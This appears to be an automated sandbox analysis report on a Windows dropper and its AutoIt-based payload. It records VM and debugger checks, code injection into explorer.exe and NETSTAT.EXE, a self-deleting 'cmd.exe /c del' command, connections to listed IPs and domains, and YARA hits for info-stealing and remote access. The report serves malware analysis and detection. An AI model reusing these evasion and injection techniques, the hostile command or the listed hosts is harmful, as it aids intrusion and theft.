Source: explorer.exe, 00000003.00000000.266277554.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.271013770.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000003.00000000.261007312.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000003.00000000.271013770.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00EE5D13
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00F34005
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00F3C2FF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3494A GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00F3494A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00F3CD9F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3CD14 FindFirstFileW,FindClose, 1_2_00F3CD14
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00F3F5D8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00F3F735
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00F3FA36
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00F33CE2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F4C6D9 LoadLibraryA,GetProcAddress, 1_2_00F4C6D9
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF0149 mov eax, dword ptr fs:[00000030h] 1_2_03AF0149
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF0005 mov eax, dword ptr fs:[00000030h] 1_2_03AF0005
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF0019 mov eax, dword ptr fs:[00000030h] 1_2_03AF0019
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF007A mov eax, dword ptr fs:[00000030h] 1_2_03AF007A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00EE5240
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F05CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00F05CAC
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 1_2_00F288CD
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0040ACF0 LdrLoadDll, 2_2_0040ACF0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F445D5 BlockInput, 1_2_00F445D5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00EFA385
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFA354 SetUnhandledExceptionFilter, 1_2_00EFA354
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00EFA385

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 18.167.242.213 80
Source: C:\Windows\explorer.exe Network Connect: 103.100.63.146 80
Source: C:\Windows\explorer.exe Domain query: www.111lll.xyz
Source: C:\Windows\explorer.exe Domain query: www.73129.vip
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\kmhbvf.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 120000
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Thread register set: target process: 3452
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3452
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F31AC6 SendInput,keybd_event, 1_2_00F31AC6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F29369 LogonUserW, 1_2_00F29369
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00EE5240
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F351E2 mouse_event, 1_2_00F351E2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F34F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_00F34F1C
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 1_2_00F288CD
Source: shedfam.exe, 00000000.00000002.258371717.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000000.244367658.0000000000F86000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.249911083.0000000000F86000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: kmhbvf.exe, explorer.exe, 00000003.00000000.303545502.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.271730124.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.299459459.0000000006770000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.257495266.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321537541.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF885B cpuid 1_2_00EF885B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F10030 GetLocalTime,__swprintf, 1_2_00F10030
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 1_2_00F0416A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F10722 GetUserNameW, 1_2_00F10722
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F

Stealing of Sensitive Information

Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: kmhbvf.exe Binary or memory string: WIN_81
Source: kmhbvf.exe Binary or memory string: WIN_XP
Source: kmhbvf.exe Binary or memory string: WIN_XPe
Source: kmhbvf.exe Binary or memory string: WIN_VISTA
Source: kmhbvf.exe Binary or memory string: WIN_7
Source: kmhbvf.exe Binary or memory string: WIN_8
Source: kmhbvf.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F4696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 1_2_00F4696E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F46E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 1_2_00F46E32